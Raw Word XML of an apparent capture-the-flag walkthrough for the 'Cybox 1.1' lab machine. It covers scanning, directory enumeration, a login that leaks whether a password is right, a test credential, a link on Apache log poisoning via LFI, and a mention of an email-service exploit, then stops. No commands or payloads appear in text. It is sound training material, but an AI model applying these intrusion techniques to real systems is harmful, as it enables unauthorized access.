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15BF68AC" w:rsidR="00C173B3" w:rsidRDefault="00775F2D" w:rsidP="00DC0550">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Walkthrough </w:t>
      </w:r>
      <w:r w:rsidR="00AB292A">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB292A">
        <w:t>Cybox 1.1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2417EB56" w14:textId="67F5F866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89817" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host Discovery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17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2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44AC00CF" w14:textId="1CDD72D9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18" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nmap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18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2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15A7D261" w14:textId="48FACEB9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19" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gobuster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19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2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623E8A29" w14:textId="13395FC2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20" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dirb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20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2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14472635" w14:textId="70A081AE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21" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Viewing Website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21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3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08917488" w14:textId="78168AE2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22" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploitation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22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4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4F303E80" w14:textId="15CC5BFB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23" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Flag 1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23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6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08DA9E14" w14:textId="36B67489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24" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Escalation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24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6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45EF161E" w14:textId="2E4FA629" w:rsidR="00285D9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3389825" w:history="1">
            <w:r w:rsidR="00285D96" w:rsidRPr="00512494">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Flag 2</w:t>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153389825 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00285D96">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C8BC5BB" w14:textId="0030673A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012CA771" w14:textId="3F97B3FE" w:rsidR="007307F9" w:rsidRDefault="00C17A87">
      <w:r w:rsidRPr="00C17A87">
        <w:t>https://www.hackingarticles.in/apache-log-poisoning-through-lfi/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B1D214" w14:textId="09E38CE6" w:rsidR="007307F9" w:rsidRDefault="00DC0550" w:rsidP="00C3012F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc153389817"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="398B314A" w14:textId="7C8DB21A" w:rsidR="0073627E" w:rsidRDefault="0073627E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79D06371" wp14:editId="62F689E0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>386507</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="852170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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1504558210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58210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AEBE4B7" wp14:editId="0DC776A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213735" cy="307975"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20041"/>
                <wp:lineTo x="21510" y="20041"/>
                <wp:lineTo x="21510" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="86709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953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73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1B087" w14:textId="2423A44A" w:rsidR="00D21621" w:rsidRDefault="00701F6A">
      <w:r w:rsidRPr="00712C2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C25AE" w14:textId="005C6D96" w:rsidR="00701F6A" w:rsidRDefault="00701F6A">
      <w:r w:rsidRPr="00712C2A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ABA748" w14:textId="02EDE420" w:rsidR="00D21621" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc153389818"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47CB4658" w14:textId="0961BC4A" w:rsidR="00D21621" w:rsidRDefault="00953EF8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46278F72" wp14:editId="45BC2827">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5572</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3281680" cy="255270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19343"/>
                <wp:lineTo x="21441" y="19343"/>
                <wp:lineTo x="21441" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12922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1D253" w14:textId="13DA8D6B" w:rsidR="00F53395" w:rsidRDefault="001855A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E37875F" wp14:editId="5E1B325F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>53738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3916680" cy="584835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21107"/>
                <wp:lineTo x="21432" y="21107"/>
                <wp:lineTo x="21432" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="200021829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18294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0676" cy="5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9A147" w14:textId="52FC562C" w:rsidR="001855A9" w:rsidRDefault="00BF7A34">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46D39FBB" wp14:editId="52F68180">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>728468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="603250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21145"/>
                <wp:lineTo x="21538" y="21145"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="232117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17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5A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="515EF418" wp14:editId="14C64E16">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>427165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="220345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20542"/>
                <wp:lineTo x="21538" y="20542"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="138302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28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0AC2DDA4" w:rsidR="00DC0550" w:rsidRDefault="001F670F" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc153389819"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E033117" wp14:editId="70BD887C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1881913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21168"/>
                <wp:lineTo x="21538" y="21168"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="115435565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5565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BEF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A2F6D60" wp14:editId="212A83E6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1588685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="224790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20136"/>
                <wp:lineTo x="21538" y="20136"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="208394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489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E4D">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="61D8F1F5" w14:textId="7914C6CF" w:rsidR="00DB5E4D" w:rsidRDefault="00A320D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A4A3E79" wp14:editId="2D1BDF66">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1568099</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="141605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="17435"/>
                <wp:lineTo x="21538" y="17435"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="158424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460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 these to the hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB29278" w14:textId="3A6D4CD8" w:rsidR="00EC6536" w:rsidRDefault="00EC6536" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc153389820"/>
      <w:r>
        <w:t>Dirb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="78F3C857" w14:textId="0AFA7488" w:rsidR="00D21621" w:rsidRDefault="00E4397C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4555337D" wp14:editId="4DB9171E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>54373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2282190" cy="340995"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20514"/>
                <wp:lineTo x="21456" y="20514"/>
                <wp:lineTo x="21456" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="71839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98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84" cy="344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E3723" w14:textId="77777777" w:rsidR="00E4397C" w:rsidRDefault="00E4397C"/>
    <w:p w14:paraId="3162C5F3" w14:textId="6D250B79" w:rsidR="00E4397C" w:rsidRDefault="004059A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="413601FD" wp14:editId="7AC09147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04762" cy="276190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19410"/>
                <wp:lineTo x="21444" y="19410"/>
                <wp:lineTo x="21444" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="27589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943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9EF15" w14:textId="3C0B1AB7" w:rsidR="00D21621" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc153389821"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Viewing Website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="65BCED0D" w14:textId="0FF65374" w:rsidR="00D21621" w:rsidRDefault="005D4E94">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19C9E865" wp14:editId="0DE211FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>385796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4408170" cy="513080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20851"/>
                <wp:lineTo x="21469" y="20851"/>
                <wp:lineTo x="21469" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="134523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16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6B">
        <w:t>The index.html page is just a default webpage and contains nothing important.</w:t>
      </w:r>
      <w:r w:rsidR="00297F1E">
        <w:t xml:space="preserve"> However, PHPmyAdmin contains text.</w:t>
      </w:r>
      <w:r w:rsidR="00CA1789">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE127E7" w14:textId="06E82446" w:rsidR="004059A0" w:rsidRDefault="004059A0"/>
    <w:p w14:paraId="03135186" w14:textId="211E55F1" w:rsidR="004059A0" w:rsidRDefault="004059A0"/>
    <w:p w14:paraId="5DFDD85F" w14:textId="4DBFDA03" w:rsidR="00A00F3C" w:rsidRDefault="00CA1789">
      <w:r>
        <w:t>Looking at the gobuster results I viewed the register page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D6981" w14:textId="7EE667C3" w:rsidR="00CA1789" w:rsidRDefault="00CA1789">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68279EF2" wp14:editId="7EE123C5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2323809" cy="295238"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19552"/>
                <wp:lineTo x="21429" y="19552"/>
                <wp:lineTo x="21429" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="125533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336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B83C1" w14:textId="3386A2CB" w:rsidR="00A00F3C" w:rsidRDefault="00CA1789">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="597598FB" wp14:editId="14821FCA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88492</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1516380" cy="880110"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21039"/>
                <wp:lineTo x="21437" y="21039"/>
                <wp:lineTo x="21437" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="10763581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813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7813" cy="886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 then quickly made an account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624DFCC" w14:textId="59782128" w:rsidR="001855A9" w:rsidRDefault="00CA1789">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C7CFAF6" wp14:editId="33417069">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1775015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4294</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2632075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418" y="21159"/>
                <wp:lineTo x="21418" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="165396930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69306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BE80E" w14:textId="7728F3C5" w:rsidR="003122B9" w:rsidRDefault="003122B9"/>
    <w:p w14:paraId="5925222B" w14:textId="6FE3F592" w:rsidR="003122B9" w:rsidRDefault="003122B9"/>
    <w:p w14:paraId="29A6B611" w14:textId="148BFD11" w:rsidR="00CA1789" w:rsidRDefault="00CA1789"/>
    <w:p w14:paraId="21E6A72E" w14:textId="6D401DC7" w:rsidR="00A00F3C" w:rsidRDefault="00C92F90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F64B464" wp14:editId="2B964EEB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3238095" cy="323810"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20369"/>
                <wp:lineTo x="21477" y="20369"/>
                <wp:lineTo x="21477" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="131127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78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BED981" w14:textId="6616E958" w:rsidR="00C92F90" w:rsidRDefault="00C92F90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02F69993" wp14:editId="3E711966">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>91251</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2092325" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21408"/>
                <wp:lineTo x="21436" y="21408"/>
                <wp:lineTo x="21436" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="142372280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2808" name="Picture 1" descr="A screenshot of a login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ECD5C" w14:textId="298D3FB6" w:rsidR="00C92F90" w:rsidRDefault="001F54B1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D40AC69" wp14:editId="5492C239">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>207190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="156972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233" y="21254"/>
                <wp:lineTo x="21233" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="121069166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91667" name="Picture 1" descr="A screenshot of a login for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F90">
        <w:t>The error message tells me if the password is correct. This might mean I can brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E37266" w14:textId="6B39B07B" w:rsidR="00C92F90" w:rsidRDefault="00C92F90"/>
    <w:p w14:paraId="4144CC16" w14:textId="0F2F6DA0" w:rsidR="001F54B1" w:rsidRDefault="001F54B1"/>
    <w:p w14:paraId="148FA9E3" w14:textId="2B17AA16" w:rsidR="001F54B1" w:rsidRDefault="001F54B1"/>
    <w:p w14:paraId="391D161B" w14:textId="77777777" w:rsidR="001F54B1" w:rsidRDefault="001F54B1"/>
    <w:p w14:paraId="2E43FE81" w14:textId="0CDC9B3D" w:rsidR="001F54B1" w:rsidRDefault="001F54B1">
      <w:r>
        <w:t>I then registered an account with monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00400FE9" w14:textId="6B5A7897" w:rsidR="008E5560" w:rsidRDefault="008363B1">
      <w:r>
        <w:t>Mike:mike12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F2999" w14:textId="3FE07F7C" w:rsidR="008E5560" w:rsidRDefault="008E5560">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="357B92F2" wp14:editId="5B88CB13">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>87479</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2542857" cy="285714"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20205"/>
                <wp:lineTo x="21363" y="20205"/>
                <wp:lineTo x="21363" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="82902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71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F3660" w14:textId="22879B8E" w:rsidR="008E5560" w:rsidRDefault="008E5560">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3921079D" wp14:editId="47675274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3964305" cy="326390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20171"/>
                <wp:lineTo x="21486" y="20171"/>
                <wp:lineTo x="21486" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="53143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38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3A54C" w14:textId="74C6BFE4" w:rsidR="00C92F90" w:rsidRDefault="00C92F90"/>
    <w:p w14:paraId="30FA5E71" w14:textId="77777777" w:rsidR="00C92F90" w:rsidRDefault="00C92F90"/>
    <w:p w14:paraId="016C1957" w14:textId="3A111142" w:rsidR="00C92F90" w:rsidRDefault="00C10134">
      <w:r>
        <w:t>I found out there is an exploit for the email service this machine uses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC15005" w14:textId="7091D77D" w:rsidR="00C10134" w:rsidRPr="008018A3" w:rsidRDefault="00C10134" w:rsidP="00C10134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
